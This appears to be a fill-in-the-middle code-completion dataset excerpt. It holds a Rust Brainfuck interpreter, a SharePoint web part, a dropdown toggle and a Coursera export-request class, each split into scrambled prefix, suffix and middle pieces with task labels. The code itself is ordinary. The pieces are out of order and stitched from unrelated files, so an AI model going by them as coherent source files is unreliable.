    private changeToggleIcon(): void {
const openIcon: HTMLElement = this.root.querySelector(".fa-chevron-down");
const closeIcon: HTMLElement = this.root.querySelector(".fa-chevron-up");
if (openIcon) {
openIcon.classList.replace("fa-chevron-down", "fa-chevron-up");
}
if (closeIcon) {
closeIcon.classList.replace("fa-chevron-up", "fa-chevron-down");
}
}
}
| DropDownMenu | identifier_name |
interpreter.rs | use std::io::stdin;
use operations::Op;
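/// A minimal Brainfuck interpreter: `ops` holds the parsed program,
/// `memory` is the conventional 30,000-cell byte tape, and `pointer` is the
/// data pointer into it.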
pub struct Interpreter {
memory: Vec<u8>,
pointer: i64,
ops: Vec<Op>,
}
impl Interpreter {
pub fn new(ops: Vec<Op>) -> Interpreter {
        let m = vec![0u8; 30000]; // conventional Brainfuck tape size
Interpreter { memory: m, pointer: 0, ops: ops }
}
pub fn run(&mut self) {
let mut program_counter = 0;
while program_counter < self.ops.len() {
match self.ops[program_counter] {
Op::Increment => self.increment(),
Op::Decrement => self.decrement(),
Op::Output => self.output(),
Op::Right => self.right(),
Op::Left => self.left(),
Op::Input => self.input(),
Op::Jump => self.jump(&mut program_counter),
Op::JumpBack => self.jump_back(&mut program_counter),
                _ => panic!("unsupported operation"),
}
program_counter += 1;
}
println!("");
}
fn left(&mut self) {
self.pointer -= 1;
}
fn right(&mut self) {
self.pointer += 1;
}
fn input(&mut self) {
let mut input = String::new();
stdin()
.read_line(&mut input).ok().expect("Error reading user input");
self.memory[self.pointer as usize] = input.bytes().next().expect("no byte read") as u8;
}
fn increment(&mut self) {
self.memory[self.pointer as usize] += 1;
}
fn decrement(&mut self) {
self.memory[self.pointer as usize] -= 1;
}
fn output(&self) {
print!("{}", (self.memory[self.pointer as usize]) as char);
}
fn jump(&mut self, program_counter: &mut usize) {
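        // '[': when the current cell is zero, scan forward past the matching
        // ']'; `bal` tracks bracket nesting.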
let mut bal = 1i32;
if self.memory[self.pointer as usize] == 0u8 {
loop {
*program_counter += 1;
if self.ops[*program_counter] == Op::Jump {
bal += 1;
} else if self.ops[*program_counter] == Op::JumpBack {
bal -= 1;
}
if bal == 0 {
break;
}
}
}
}
fn jump_back(&mut self, program_counter: &mut usize) |
}
| {
let mut bal = 0i32;
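        // ']': scan back to the matching '['; `run` then steps forward onto
        // it, so the loop condition is re-tested there.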
loop {
if self.ops[*program_counter] == Op::Jump {
bal += 1;
} else if self.ops[*program_counter] == Op::JumpBack {
bal -= 1;
}
*program_counter -= 1;
if bal == 0 {
break;
}
}
} | identifier_body |
interpreter.rs | use std::io::stdin;
use operations::Op;
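/// A minimal Brainfuck interpreter: `ops` holds the parsed program,
/// `memory` is the conventional 30,000-cell byte tape, and `pointer` is the
/// data pointer into it.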
pub struct Interpreter {
memory: Vec<u8>,
pointer: i64,
ops: Vec<Op>,
}
impl Interpreter {
pub fn new(ops: Vec<Op>) -> Interpreter {
        let m = vec![0u8; 30000]; // conventional Brainfuck tape size
Interpreter { memory: m, pointer: 0, ops: ops }
}
pub fn run(&mut self) {
let mut program_counter = 0;
while program_counter < self.ops.len() {
match self.ops[program_counter] {
Op::Increment => self.increment(),
Op::Decrement => self.decrement(),
Op::Output => self.output(),
Op::Right => self.right(),
Op::Left => self.left(),
Op::Input => self.input(),
Op::Jump => self.jump(&mut program_counter),
Op::JumpBack => self.jump_back(&mut program_counter),
                _ => panic!("unsupported operation"),
}
program_counter += 1;
}
println!("");
}
fn left(&mut self) {
self.pointer -= 1;
}
fn right(&mut self) {
self.pointer += 1;
}
fn input(&mut self) {
let mut input = String::new();
stdin()
.read_line(&mut input).ok().expect("Error reading user input");
self.memory[self.pointer as usize] = input.bytes().next().expect("no byte read") as u8;
}
fn increment(&mut self) {
self.memory[self.pointer as usize] += 1;
}
fn | (&mut self) {
self.memory[self.pointer as usize] -= 1;
}
fn output(&self) {
print!("{}", (self.memory[self.pointer as usize]) as char);
}
fn jump(&mut self, program_counter: &mut usize) {
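        // '[': when the current cell is zero, scan forward past the matching
        // ']'; `bal` tracks bracket nesting.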
let mut bal = 1i32;
if self.memory[self.pointer as usize] == 0u8 {
loop {
*program_counter += 1;
if self.ops[*program_counter] == Op::Jump {
bal += 1;
} else if self.ops[*program_counter] == Op::JumpBack {
bal -= 1;
}
if bal == 0 {
break;
}
}
}
}
fn jump_back(&mut self, program_counter: &mut usize) {
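        // ']': scan back to the matching '['; `run` then steps forward onto
        // it, so the loop condition is re-tested there.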
let mut bal = 0i32;
loop {
if self.ops[*program_counter] == Op::Jump {
bal += 1;
} else if self.ops[*program_counter] == Op::JumpBack {
bal -= 1;
}
*program_counter -= 1;
if bal == 0 {
break;
}
}
}
}
| decrement | identifier_name |
interpreter.rs | use std::io::stdin;
use operations::Op;
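/// A minimal Brainfuck interpreter: `ops` holds the parsed program,
/// `memory` is the conventional 30,000-cell byte tape, and `pointer` is the
/// data pointer into it.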
pub struct Interpreter {
memory: Vec<u8>,
pointer: i64,
ops: Vec<Op>,
}
impl Interpreter {
pub fn new(ops: Vec<Op>) -> Interpreter {
        let m = vec![0u8; 30000]; // conventional Brainfuck tape size
Interpreter { memory: m, pointer: 0, ops: ops }
}
pub fn run(&mut self) {
let mut program_counter = 0;
while program_counter < self.ops.len() {
match self.ops[program_counter] {
Op::Increment => self.increment(),
Op::Decrement => self.decrement(),
Op::Output => self.output(),
Op::Right => self.right(),
Op::Left => self.left(),
Op::Input => self.input(),
Op::Jump => self.jump(&mut program_counter),
Op::JumpBack => self.jump_back(&mut program_counter),
                _ => panic!("unsupported operation"),
}
program_counter += 1;
}
println!(""); | self.pointer -= 1;
}
fn right(&mut self) {
self.pointer += 1;
}
fn input(&mut self) {
let mut input = String::new();
stdin()
.read_line(&mut input).ok().expect("Error reading user input");
self.memory[self.pointer as usize] = input.bytes().next().expect("no byte read") as u8;
}
fn increment(&mut self) {
self.memory[self.pointer as usize] += 1;
}
fn decrement(&mut self) {
self.memory[self.pointer as usize] -= 1;
}
fn output(&self) {
print!("{}", (self.memory[self.pointer as usize]) as char);
}
fn jump(&mut self, program_counter: &mut usize) {
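        // '[': when the current cell is zero, scan forward past the matching
        // ']'; `bal` tracks bracket nesting.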
let mut bal = 1i32;
if self.memory[self.pointer as usize] == 0u8 {
loop {
*program_counter += 1;
if self.ops[*program_counter] == Op::Jump {
bal += 1;
} else if self.ops[*program_counter] == Op::JumpBack {
bal -= 1;
}
if bal == 0 {
break;
}
}
}
}
fn jump_back(&mut self, program_counter: &mut usize) {
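        // ']': scan back to the matching '['; `run` then steps forward onto
        // it, so the loop condition is re-tested there.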
let mut bal = 0i32;
loop {
if self.ops[*program_counter] == Op::Jump {
bal += 1;
} else if self.ops[*program_counter] == Op::JumpBack {
bal -= 1;
}
*program_counter -= 1;
if bal == 0 {
break;
}
}
}
} | }
fn left(&mut self) { | random_line_split |
MetadataNewsWebPart.ts | import * as React from 'react';
import * as ReactDom from 'react-dom';
import { Version } from '@microsoft/sp-core-library';
import {
BaseClientSideWebPart,
IPropertyPaneConfiguration,
PropertyPaneTextField,
PropertyPaneChoiceGroup,
PropertyPaneCheckbox,
PropertyPaneCustomField,
PropertyPaneFieldType,
PropertyPaneHorizontalRule,
PropertyPaneToggle
} from '@microsoft/sp-webpart-base';
import * as strings from 'MetadataNewsWebPartStrings';
import MetadataNews from './components/MetadataNews';
import { IMetadataNewsProps } from '../../interfaces';
import * as pnp from '@pnp/sp';
import { override } from '@microsoft/decorators';
export default class MetadataNewsWebPart extends BaseClientSideWebPart<IMetadataNewsProps> {
private lookupsFetched: boolean;
protected onInit(): Promise<void> {
return new Promise((resolve, reject) => {
if (this.properties.ItemLimit === undefined) {
this.properties.ItemLimit = 5;
this.properties.ItemHeight = "180";
this.properties.RefinerInfos = [];
this.properties.AdditionalFilter = null;
this.properties.HideRefinerFromItemCard = null;
}
if (this.properties.containerWidth === undefined) {
this.properties.containerWidth = "900";
}
if (this.properties.multiColumn === undefined) {
this.properties.multiColumn = false;
}
pnp.sp.setup({
sp: {
headers: {
Accept: 'application/json;odata=verbose'
},
baseUrl: this.context.pageContext.web.absoluteUrl
}
});
this.properties.webUrl = this.context.pageContext.web.absoluteUrl;
resolve();
});
}
@override
public onDispose() {
super.onDispose();
}
public render(): void {
const element: React.ReactElement<IMetadataNewsProps> = React.createElement(MetadataNews, this.properties);
ReactDom.render(element, this.domElement);
}
protected get dataVersion(): Version {
return Version.parse('1.0');
}
protected get disableReactivePropertyChanges(): boolean {
return true;
}
// Get the property pane configuration
    // During the first opening we will fetch all of the lookup fields
    // In order for the new fields to become visible, we have to change the value of one of the initially visible fields, such as Item limit or Item height
// Please refer to Chris O'Brien's article http://www.sharepointnutsandbolts.com/2016/09/sharepoint-framework-spfx-web-part-properties-dynamic-dropdown.html
protected getPropertyPaneConfiguration(): IPropertyPaneConfiguration {
if (!this.lookupsFetched) {
this.lookupsFetched = true;
pnp.sp.web.lists.getByTitle("Site Pages").fields.filter("ReadOnlyField eq false and Hidden eq false and substringof('Lookup',TypeAsString)").get().then((res: any[]) => {
for (let f of res) {
if (!this.properties.RefinerInfos.some(ri => ri.InternalName == f.InternalName)) {
this.properties.RefinerInfos.push({
IsSelected: false,
DisplayName: f.Title,
InternalName: f.InternalName,
IsMultiValue: f.TypeAsString == 'Lookup' ? false : true,
DefaultValues: '',
List: f.LookupList
});
}
}
this.onDispose();
}).catch(error => {
console.log(error);
});
}
let config = {} as IPropertyPaneConfiguration;
config.pages = [
{
header: {
description: strings.PropertyPaneDescription
},
displayGroupsAsAccordion: true,
groups: [
{
groupName: "General",
groupFields: [
PropertyPaneTextField('ItemLimit', {
label: 'Item limit',
value: this.properties.ItemLimit.toString(),
onGetErrorMessage: (text) => this.validateItemLimit(text)
}),
PropertyPaneHorizontalRule(),
PropertyPaneTextField('ItemHeight', {
label: 'Item height (px)',
value: this.properties.ItemHeight,
onGetErrorMessage: (text) => this.validateItemHeight(text)
}),
PropertyPaneHorizontalRule(),
PropertyPaneTextField('AdditionalFilter', {
label: 'Additional filter',
value: this.properties.AdditionalFilter,
}),
PropertyPaneHorizontalRule(),
PropertyPaneTextField('HideRefinerFromItemCard', {
label: 'Hide this refiner (internal name) value from item card',
value: this.properties.HideRefinerFromItemCard,
}),
PropertyPaneHorizontalRule(),
PropertyPaneTextField('containerWidth', {
label: 'Width of container in px',
value: this.properties.containerWidth,
}),
PropertyPaneHorizontalRule(),
PropertyPaneToggle('multiColumn', {
label: 'Show items in multiple columns'
})
]
},
{
groupName: "Refiner fields",
groupFields: []
}
]
}
];
| config.pages[0].groups[1].groupFields.push(PropertyPaneTextField(`RefinerInfos[${infoIndex}].DefaultValues`, { description: "; delimited refiner values", value: this.properties.RefinerInfos[infoIndex].DefaultValues}));
config.pages[0].groups[1].groupFields.push(PropertyPaneHorizontalRule());
}
}
return config;
}
private validateItemLimit(text: string) {
const errMsg = 'Value must be numeric and between 1 and 100';
if (text == null || text == '') {
return errMsg;
} else {
let number = parseInt(text);
if (number.toString() != text || number < 1 || number > 100) {
return errMsg;
}
}
return '';
}
private validateItemHeight(text: string) {
const errMsg = 'Value must be numeric and between 150 and 500';
if (text == null || text == '') {
return errMsg;
} else {
let number = parseInt(text);
if (number.toString() != text || number < 150 || number > 500) {
return errMsg;
}
}
return '';
}
} | if (this.lookupsFetched) {
for (let infoIndex in this.properties.RefinerInfos) {
config.pages[0].groups[1].groupFields.push(PropertyPaneCheckbox(`RefinerInfos[${infoIndex}].IsSelected`, { text: this.properties.RefinerInfos[infoIndex].DisplayName})); | random_line_split |
MetadataNewsWebPart.ts | import * as React from 'react';
import * as ReactDom from 'react-dom';
import { Version } from '@microsoft/sp-core-library';
import {
BaseClientSideWebPart,
IPropertyPaneConfiguration,
PropertyPaneTextField,
PropertyPaneChoiceGroup,
PropertyPaneCheckbox,
PropertyPaneCustomField,
PropertyPaneFieldType,
PropertyPaneHorizontalRule,
PropertyPaneToggle
} from '@microsoft/sp-webpart-base';
import * as strings from 'MetadataNewsWebPartStrings';
import MetadataNews from './components/MetadataNews';
import { IMetadataNewsProps } from '../../interfaces';
import * as pnp from '@pnp/sp';
import { override } from '@microsoft/decorators';
export default class MetadataNewsWebPart extends BaseClientSideWebPart<IMetadataNewsProps> {
private lookupsFetched: boolean;
protected onInit(): Promise<void> {
return new Promise((resolve, reject) => {
if (this.properties.ItemLimit === undefined) {
this.properties.ItemLimit = 5;
this.properties.ItemHeight = "180";
this.properties.RefinerInfos = [];
this.properties.AdditionalFilter = null;
this.properties.HideRefinerFromItemCard = null;
}
if (this.properties.containerWidth === undefined) {
this.properties.containerWidth = "900";
}
if (this.properties.multiColumn === undefined) {
this.properties.multiColumn = false;
}
pnp.sp.setup({
sp: {
headers: {
Accept: 'application/json;odata=verbose'
},
baseUrl: this.context.pageContext.web.absoluteUrl
}
});
this.properties.webUrl = this.context.pageContext.web.absoluteUrl;
resolve();
});
}
@override
public | () {
super.onDispose();
}
public render(): void {
const element: React.ReactElement<IMetadataNewsProps> = React.createElement(MetadataNews, this.properties);
ReactDom.render(element, this.domElement);
}
protected get dataVersion(): Version {
return Version.parse('1.0');
}
protected get disableReactivePropertyChanges(): boolean {
return true;
}
// Get the property pane configuration
    // During the first opening we will fetch all of the lookup fields
    // In order for the new fields to become visible, we have to change the value of one of the initially visible fields, such as Item limit or Item height
// Please refer to Chris O'Brien's article http://www.sharepointnutsandbolts.com/2016/09/sharepoint-framework-spfx-web-part-properties-dynamic-dropdown.html
protected getPropertyPaneConfiguration(): IPropertyPaneConfiguration {
if (!this.lookupsFetched) {
this.lookupsFetched = true;
pnp.sp.web.lists.getByTitle("Site Pages").fields.filter("ReadOnlyField eq false and Hidden eq false and substringof('Lookup',TypeAsString)").get().then((res: any[]) => {
for (let f of res) {
if (!this.properties.RefinerInfos.some(ri => ri.InternalName == f.InternalName)) {
this.properties.RefinerInfos.push({
IsSelected: false,
DisplayName: f.Title,
InternalName: f.InternalName,
IsMultiValue: f.TypeAsString == 'Lookup' ? false : true,
DefaultValues: '',
List: f.LookupList
});
}
}
this.onDispose();
}).catch(error => {
console.log(error);
});
}
let config = {} as IPropertyPaneConfiguration;
config.pages = [
{
header: {
description: strings.PropertyPaneDescription
},
displayGroupsAsAccordion: true,
groups: [
{
groupName: "General",
groupFields: [
PropertyPaneTextField('ItemLimit', {
label: 'Item limit',
value: this.properties.ItemLimit.toString(),
onGetErrorMessage: (text) => this.validateItemLimit(text)
}),
PropertyPaneHorizontalRule(),
PropertyPaneTextField('ItemHeight', {
label: 'Item height (px)',
value: this.properties.ItemHeight,
onGetErrorMessage: (text) => this.validateItemHeight(text)
}),
PropertyPaneHorizontalRule(),
PropertyPaneTextField('AdditionalFilter', {
label: 'Additional filter',
value: this.properties.AdditionalFilter,
}),
PropertyPaneHorizontalRule(),
PropertyPaneTextField('HideRefinerFromItemCard', {
label: 'Hide this refiner (internal name) value from item card',
value: this.properties.HideRefinerFromItemCard,
}),
PropertyPaneHorizontalRule(),
PropertyPaneTextField('containerWidth', {
label: 'Width of container in px',
value: this.properties.containerWidth,
}),
PropertyPaneHorizontalRule(),
PropertyPaneToggle('multiColumn', {
label: 'Show items in multiple columns'
})
]
},
{
groupName: "Refiner fields",
groupFields: []
}
]
}
];
if (this.lookupsFetched) {
for (let infoIndex in this.properties.RefinerInfos) {
config.pages[0].groups[1].groupFields.push(PropertyPaneCheckbox(`RefinerInfos[${infoIndex}].IsSelected`, { text: this.properties.RefinerInfos[infoIndex].DisplayName}));
config.pages[0].groups[1].groupFields.push(PropertyPaneTextField(`RefinerInfos[${infoIndex}].DefaultValues`, { description: "; delimited refiner values", value: this.properties.RefinerInfos[infoIndex].DefaultValues}));
config.pages[0].groups[1].groupFields.push(PropertyPaneHorizontalRule());
}
}
return config;
}
private validateItemLimit(text: string) {
const errMsg = 'Value must be numeric and between 1 and 100';
if (text == null || text == '') {
return errMsg;
} else {
let number = parseInt(text);
if (number.toString() != text || number < 1 || number > 100) {
return errMsg;
}
}
return '';
}
private validateItemHeight(text: string) {
const errMsg = 'Value must be numeric and between 150 and 500';
if (text == null || text == '') {
return errMsg;
} else {
let number = parseInt(text);
if (number.toString() != text || number < 150 || number > 500) {
return errMsg;
}
}
return '';
}
}
| onDispose | identifier_name |
MetadataNewsWebPart.ts | import * as React from 'react';
import * as ReactDom from 'react-dom';
import { Version } from '@microsoft/sp-core-library';
import {
BaseClientSideWebPart,
IPropertyPaneConfiguration,
PropertyPaneTextField,
PropertyPaneChoiceGroup,
PropertyPaneCheckbox,
PropertyPaneCustomField,
PropertyPaneFieldType,
PropertyPaneHorizontalRule,
PropertyPaneToggle
} from '@microsoft/sp-webpart-base';
import * as strings from 'MetadataNewsWebPartStrings';
import MetadataNews from './components/MetadataNews';
import { IMetadataNewsProps } from '../../interfaces';
import * as pnp from '@pnp/sp';
import { override } from '@microsoft/decorators';
export default class MetadataNewsWebPart extends BaseClientSideWebPart<IMetadataNewsProps> {
private lookupsFetched: boolean;
protected onInit(): Promise<void> {
return new Promise((resolve, reject) => {
if (this.properties.ItemLimit === undefined) {
this.properties.ItemLimit = 5;
this.properties.ItemHeight = "180";
this.properties.RefinerInfos = [];
this.properties.AdditionalFilter = null;
this.properties.HideRefinerFromItemCard = null;
}
if (this.properties.containerWidth === undefined) {
this.properties.containerWidth = "900";
}
if (this.properties.multiColumn === undefined) {
this.properties.multiColumn = false;
}
pnp.sp.setup({
sp: {
headers: {
Accept: 'application/json;odata=verbose'
},
baseUrl: this.context.pageContext.web.absoluteUrl
}
});
this.properties.webUrl = this.context.pageContext.web.absoluteUrl;
resolve();
});
}
@override
public onDispose() {
super.onDispose();
}
public render(): void |
protected get dataVersion(): Version {
return Version.parse('1.0');
}
protected get disableReactivePropertyChanges(): boolean {
return true;
}
// Get the property pane configuration
    // During the first opening we will fetch all of the lookup fields
    // In order for the new fields to become visible, we have to change the value of one of the initially visible fields, such as Item limit or Item height
// Please refer to Chris O'Brien's article http://www.sharepointnutsandbolts.com/2016/09/sharepoint-framework-spfx-web-part-properties-dynamic-dropdown.html
protected getPropertyPaneConfiguration(): IPropertyPaneConfiguration {
if (!this.lookupsFetched) {
this.lookupsFetched = true;
pnp.sp.web.lists.getByTitle("Site Pages").fields.filter("ReadOnlyField eq false and Hidden eq false and substringof('Lookup',TypeAsString)").get().then((res: any[]) => {
for (let f of res) {
if (!this.properties.RefinerInfos.some(ri => ri.InternalName == f.InternalName)) {
this.properties.RefinerInfos.push({
IsSelected: false,
DisplayName: f.Title,
InternalName: f.InternalName,
IsMultiValue: f.TypeAsString == 'Lookup' ? false : true,
DefaultValues: '',
List: f.LookupList
});
}
}
this.onDispose();
}).catch(error => {
console.log(error);
});
}
let config = {} as IPropertyPaneConfiguration;
config.pages = [
{
header: {
description: strings.PropertyPaneDescription
},
displayGroupsAsAccordion: true,
groups: [
{
groupName: "General",
groupFields: [
PropertyPaneTextField('ItemLimit', {
label: 'Item limit',
value: this.properties.ItemLimit.toString(),
onGetErrorMessage: (text) => this.validateItemLimit(text)
}),
PropertyPaneHorizontalRule(),
PropertyPaneTextField('ItemHeight', {
label: 'Item height (px)',
value: this.properties.ItemHeight,
onGetErrorMessage: (text) => this.validateItemHeight(text)
}),
PropertyPaneHorizontalRule(),
PropertyPaneTextField('AdditionalFilter', {
label: 'Additional filter',
value: this.properties.AdditionalFilter,
}),
PropertyPaneHorizontalRule(),
PropertyPaneTextField('HideRefinerFromItemCard', {
label: 'Hide this refiner (internal name) value from item card',
value: this.properties.HideRefinerFromItemCard,
}),
PropertyPaneHorizontalRule(),
PropertyPaneTextField('containerWidth', {
label: 'Width of container in px',
value: this.properties.containerWidth,
}),
PropertyPaneHorizontalRule(),
PropertyPaneToggle('multiColumn', {
label: 'Show items in multiple columns'
})
]
},
{
groupName: "Refiner fields",
groupFields: []
}
]
}
];
if (this.lookupsFetched) {
for (let infoIndex in this.properties.RefinerInfos) {
config.pages[0].groups[1].groupFields.push(PropertyPaneCheckbox(`RefinerInfos[${infoIndex}].IsSelected`, { text: this.properties.RefinerInfos[infoIndex].DisplayName}));
config.pages[0].groups[1].groupFields.push(PropertyPaneTextField(`RefinerInfos[${infoIndex}].DefaultValues`, { description: "; delimited refiner values", value: this.properties.RefinerInfos[infoIndex].DefaultValues}));
config.pages[0].groups[1].groupFields.push(PropertyPaneHorizontalRule());
}
}
return config;
}
private validateItemLimit(text: string) {
const errMsg = 'Value must be numeric and between 1 and 100';
if (text == null || text == '') {
return errMsg;
} else {
let number = parseInt(text);
if (number.toString() != text || number < 1 || number > 100) {
return errMsg;
}
}
return '';
}
private validateItemHeight(text: string) {
const errMsg = 'Value must be numeric and between 150 and 500';
if (text == null || text == '') {
return errMsg;
} else {
let number = parseInt(text);
if (number.toString() != text || number < 150 || number > 500) {
return errMsg;
}
}
return '';
}
}
| {
const element: React.ReactElement<IMetadataNewsProps> = React.createElement(MetadataNews, this.properties);
ReactDom.render(element, this.domElement);
} | identifier_body |
MetadataNewsWebPart.ts | import * as React from 'react';
import * as ReactDom from 'react-dom';
import { Version } from '@microsoft/sp-core-library';
import {
BaseClientSideWebPart,
IPropertyPaneConfiguration,
PropertyPaneTextField,
PropertyPaneChoiceGroup,
PropertyPaneCheckbox,
PropertyPaneCustomField,
PropertyPaneFieldType,
PropertyPaneHorizontalRule,
PropertyPaneToggle
} from '@microsoft/sp-webpart-base';
import * as strings from 'MetadataNewsWebPartStrings';
import MetadataNews from './components/MetadataNews';
import { IMetadataNewsProps } from '../../interfaces';
import * as pnp from '@pnp/sp';
import { override } from '@microsoft/decorators';
export default class MetadataNewsWebPart extends BaseClientSideWebPart<IMetadataNewsProps> {
private lookupsFetched: boolean;
protected onInit(): Promise<void> {
return new Promise((resolve, reject) => {
if (this.properties.ItemLimit === undefined) {
this.properties.ItemLimit = 5;
this.properties.ItemHeight = "180";
this.properties.RefinerInfos = [];
this.properties.AdditionalFilter = null;
this.properties.HideRefinerFromItemCard = null;
}
if (this.properties.containerWidth === undefined) {
this.properties.containerWidth = "900";
}
if (this.properties.multiColumn === undefined) {
this.properties.multiColumn = false;
}
pnp.sp.setup({
sp: {
headers: {
Accept: 'application/json;odata=verbose'
},
baseUrl: this.context.pageContext.web.absoluteUrl
}
});
this.properties.webUrl = this.context.pageContext.web.absoluteUrl;
resolve();
});
}
@override
public onDispose() {
super.onDispose();
}
public render(): void {
const element: React.ReactElement<IMetadataNewsProps> = React.createElement(MetadataNews, this.properties);
ReactDom.render(element, this.domElement);
}
protected get dataVersion(): Version {
return Version.parse('1.0');
}
protected get disableReactivePropertyChanges(): boolean {
return true;
}
// Get the property pane configuration
    // During the first opening we will fetch all of the lookup fields
    // In order for the new fields to become visible, we have to change the value of one of the initially visible fields, such as Item limit or Item height
// Please refer to Chris O'Brien's article http://www.sharepointnutsandbolts.com/2016/09/sharepoint-framework-spfx-web-part-properties-dynamic-dropdown.html
protected getPropertyPaneConfiguration(): IPropertyPaneConfiguration {
if (!this.lookupsFetched) {
this.lookupsFetched = true;
pnp.sp.web.lists.getByTitle("Site Pages").fields.filter("ReadOnlyField eq false and Hidden eq false and substringof('Lookup',TypeAsString)").get().then((res: any[]) => {
for (let f of res) {
if (!this.properties.RefinerInfos.some(ri => ri.InternalName == f.InternalName)) {
this.properties.RefinerInfos.push({
IsSelected: false,
DisplayName: f.Title,
InternalName: f.InternalName,
IsMultiValue: f.TypeAsString == 'Lookup' ? false : true,
DefaultValues: '',
List: f.LookupList
});
}
}
this.onDispose();
}).catch(error => {
console.log(error);
});
}
let config = {} as IPropertyPaneConfiguration;
config.pages = [
{
header: {
description: strings.PropertyPaneDescription
},
displayGroupsAsAccordion: true,
groups: [
{
groupName: "General",
groupFields: [
PropertyPaneTextField('ItemLimit', {
label: 'Item limit',
value: this.properties.ItemLimit.toString(),
onGetErrorMessage: (text) => this.validateItemLimit(text)
}),
PropertyPaneHorizontalRule(),
PropertyPaneTextField('ItemHeight', {
label: 'Item height (px)',
value: this.properties.ItemHeight,
onGetErrorMessage: (text) => this.validateItemHeight(text)
}),
PropertyPaneHorizontalRule(),
PropertyPaneTextField('AdditionalFilter', {
label: 'Additional filter',
value: this.properties.AdditionalFilter,
}),
PropertyPaneHorizontalRule(),
PropertyPaneTextField('HideRefinerFromItemCard', {
label: 'Hide this refiner (internal name) value from item card',
value: this.properties.HideRefinerFromItemCard,
}),
PropertyPaneHorizontalRule(),
PropertyPaneTextField('containerWidth', {
label: 'Width of container in px',
value: this.properties.containerWidth,
}),
PropertyPaneHorizontalRule(),
PropertyPaneToggle('multiColumn', {
label: 'Show items in multiple columns'
})
]
},
{
groupName: "Refiner fields",
groupFields: []
}
]
}
];
if (this.lookupsFetched) {
for (let infoIndex in this.properties.RefinerInfos) {
config.pages[0].groups[1].groupFields.push(PropertyPaneCheckbox(`RefinerInfos[${infoIndex}].IsSelected`, { text: this.properties.RefinerInfos[infoIndex].DisplayName}));
config.pages[0].groups[1].groupFields.push(PropertyPaneTextField(`RefinerInfos[${infoIndex}].DefaultValues`, { description: "; delimited refiner values", value: this.properties.RefinerInfos[infoIndex].DefaultValues}));
config.pages[0].groups[1].groupFields.push(PropertyPaneHorizontalRule());
}
}
return config;
}
private validateItemLimit(text: string) {
const errMsg = 'Value must be numeric and between 1 and 100';
if (text == null || text == '') {
return errMsg;
} else {
let number = parseInt(text);
if (number.toString() != text || number < 1 || number > 100) {
return errMsg;
}
}
return '';
}
private validateItemHeight(text: string) {
const errMsg = 'Value must be numeric and between 150 and 500';
if (text == null || text == '') {
return errMsg;
} else {
let number = parseInt(text);
if (number.toString() != text || number < 150 || number > 500) |
}
return '';
}
}
| {
return errMsg;
} | conditional_block |
ExportRequest.py | # Copyright 2016 Coursera
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from courseraresearchexports.constants.api_constants import \
ANONYMITY_LEVEL_COORDINATOR, ANONYMITY_LEVEL_ISOLATED, EXPORT_TYPE_TABLES,\
EXPORT_TYPE_CLICKSTREAM, EXPORT_TYPE_GRADEBOOK, SCHEMA_NAMES
from courseraresearchexports.models import utils
class ExportRequest:
"""
    Represents an export request for Coursera's research data export
service and provides methods for serialization.
"""
def __init__(self, course_id=None, partner_id=None, group_id=None,
export_type=None, anonymity_level=None,
statement_of_purpose=None, schema_names=None,
interval=None, ignore_existing=None, **kwargs):
self._course_id = course_id
if partner_id is not None:
self._partner_id = int(partner_id)
else:
self._partner_id = partner_id
self._group_id = group_id
self._export_type = export_type
self._anonymity_level = anonymity_level
self._statement_of_purpose = statement_of_purpose
self._schema_names = schema_names
self._interval = interval
self._ignore_existing = ignore_existing
def to_json(self):
"""
Serialize ExportRequest to a dictionary representing a json object.
        No validation is performed, except that only one scope
        specification (course/partner/group) is serialized.
:return json_request:
"""
json_request = {}
if self._course_id:
json_request['scope'] = {
'typeName': 'courseContext',
'definition': {
'courseId': self._course_id
}}
elif self._partner_id:
json_request['scope'] = {
'typeName': 'partnerContext',
'definition': {
'partnerId': {
'maestroId': self._partner_id
}}}
elif self._group_id:
json_request['scope'] = {
'typeName': 'groupContext',
'definition': {
'groupId': self._group_id
}}
if self._export_type:
json_request['exportType'] = self._export_type
if self._anonymity_level:
json_request['anonymityLevel'] = self._anonymity_level
if self._statement_of_purpose:
json_request['statementOfPurpose'] = self._statement_of_purpose
if self._schema_names:
json_request['schemaNames'] = self._schema_names
if self._interval:
json_request['interval'] = {
'start': self._interval[0], 'end': self._interval[1]}
if self._ignore_existing:
json_request['ignoreExisting'] = self._ignore_existing
return json_request
@classmethod
def from_args(cls, **kwargs):
"""
        Create an ExportRequest object using the required parameters. Performs
course_id/partner_id inference if possible.
:param kwargs:
:return export_request: ExportRequest
"""
if kwargs.get('course_slug') and not kwargs.get('course_id'):
kwargs['course_id'] = utils.lookup_course_id_by_slug(
kwargs['course_slug'])
elif kwargs.get('partner_short_name') and not kwargs.get('partner_id'):
|
if kwargs.get('user_id_hashing'):
if kwargs['user_id_hashing'] == 'linked':
kwargs['anonymity_level'] = ANONYMITY_LEVEL_COORDINATOR
elif kwargs['user_id_hashing'] == 'isolated':
kwargs['anonymity_level'] = ANONYMITY_LEVEL_ISOLATED
return cls(**kwargs)
@classmethod
def from_json(cls, json_request):
"""
Deserialize ExportRequest from json object.
:param json_request:
:return export_request: ExportRequest
"""
kwargs = {}
request_scope = json_request['scope']
request_scope_context = request_scope['typeName']
if request_scope_context == 'courseContext':
kwargs['course_id'] = request_scope['definition']['courseId']
elif request_scope_context == 'partnerContext':
kwargs['partner_id'] = \
request_scope['definition']['partnerId']['maestroId']
elif request_scope_context == 'groupContext':
kwargs['group_id'] = request_scope['definition']['groupId']
if json_request.get('interval'):
kwargs['interval'] = [
json_request['interval']['start'],
json_request['interval']['end']
]
return cls(
export_type=json_request.get('exportType'),
anonymity_level=json_request.get('anonymityLevel'),
statement_of_purpose=json_request.get('statementOfPurpose'),
schema_names=json_request.get('schemaNames'),
ignore_existing=json_request.get('ignoreExisting'),
**kwargs)
@property
def course_id(self):
return self._course_id
@property
def partner_id(self):
return self._partner_id
@property
def export_type(self):
return self._export_type
@property
def export_type_display(self):
if self._export_type == EXPORT_TYPE_GRADEBOOK:
return 'GRADEBOOK'
elif self._export_type == EXPORT_TYPE_CLICKSTREAM:
return 'CLICKSTREAM'
elif self._export_type == EXPORT_TYPE_TABLES:
return 'TABLES'
else:
return self._export_type
@property
def anonymity_level(self):
return self._anonymity_level
@property
def formatted_anonymity_level(self):
